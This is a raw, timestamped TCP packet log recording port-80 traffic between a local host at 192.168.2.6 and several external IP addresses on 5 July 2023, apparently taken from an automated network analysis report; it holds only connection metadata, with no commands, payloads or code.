                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622236013 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622977972 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623003960 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623035908 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623049021 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623059988 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623069048 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623079062 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623106003 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623701096 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623725891 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623747110 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623759985 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623769999 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623778105 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623799086 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.623914957 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624475956 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624500990 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624524117 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624532938 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624548912 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624552965 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624561071 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.624592066 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.625261068 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.625294924 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.625312090 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.625341892 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638243914 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638282061 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638314009 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638319016 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638344049 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638367891 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638371944 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638401031 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638403893 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638432026 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.638452053 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639134884 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639175892 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639199018 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639214993 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639938116 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639954090 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639976978 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.639991999 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.640024900 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.640054941 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.640669107 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.640692949 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.640707016 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.640721083 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.641458035 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.641474009 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.641556978 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.641572952 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.641714096 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642281055 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642304897 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642363071 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642424107 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642523050 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642544031 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642570972 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.642601013 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643120050 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643141985 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643162012 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643182993 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643182993 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643208027 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643233061 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643835068 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643866062 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643893957 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643898964 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643922091 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643923044 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.643965960 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644613028 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644643068 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644664049 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644665956 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644682884 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644706964 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.644746065 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645421028 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645459890 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645488977 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645492077 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645514011 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645517111 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645551920 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.645579100 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646192074 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646219015 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646236897 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646266937 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646559954 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646584034 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646605968 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646615982 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646629095 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646650076 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.646713018 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647367001 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647401094 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647417068 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647424936 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647445917 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647453070 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.647490978 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648140907 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648169994 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648195028 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648220062 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648252964 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648292065 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648302078 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.648348093 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.654989958 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655014992 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655035973 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655056953 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655069113 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655100107 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655128956 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655227900 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655249119 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655272961 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655277014 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655288935 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655302048 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655318975 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655353069 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655972004 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.655997992 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656016111 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656025887 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656037092 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656059027 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656074047 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656074047 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656095982 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656121969 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656948090 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656970978 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.656991005 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657005072 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657015085 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657021999 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657038927 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657040119 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657058001 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657074928 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657854080 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657885075 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657912970 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657915115 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657936096 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657938004 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657947063 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657963991 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.657982111 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658001900 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658752918 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658778906 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658799887 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658818960 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658821106 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658821106 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658838034 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658839941 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658853054 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.658870935 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659626007 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659657001 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659677982 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659677029 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659696102 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659698009 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659712076 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659718990 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659729004 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.659751892 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660767078 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660789967 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660804033 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660816908 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660832882 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660876036 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.660903931 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661412954 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661433935 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661453962 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661462069 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661473989 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661479950 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661490917 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661493063 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661506891 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.661525011 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662287951 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662308931 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662329912 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662333012 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662348986 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662349939 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662365913 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662369013 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662383080 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.662400007 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.663332939 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.663356066 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.663372040 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.663395882 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.663424015 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.019159079 CEST4979480192.168.2.664.125.133.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.088033915 CEST8049744104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.088114977 CEST4974480192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.114119053 CEST4979580192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.130742073 CEST804979523.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.130860090 CEST4979580192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.160005093 CEST4979580192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.176799059 CEST804979523.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.326807022 CEST804979523.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.326967001 CEST4979580192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.682408094 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.855983973 CEST8049796208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.856153011 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.909238100 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.082781076 CEST8049796208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.083385944 CEST8049796208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.083511114 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.269388914 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.443655968 CEST8049796208.109.214.162192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.443798065 CEST4979680192.168.2.6208.109.214.162
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.742959976 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.762506008 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.762691021 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.763149977 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.782632113 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.828929901 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.828989983 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.829019070 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.829041958 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.829092979 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.829132080 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856229067 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856292963 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856323004 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856389046 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856419086 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856435061 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856478930 CEST4979780192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856638908 CEST804979762.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.856662989 CEST804979762.75.216.137192.168.2.6
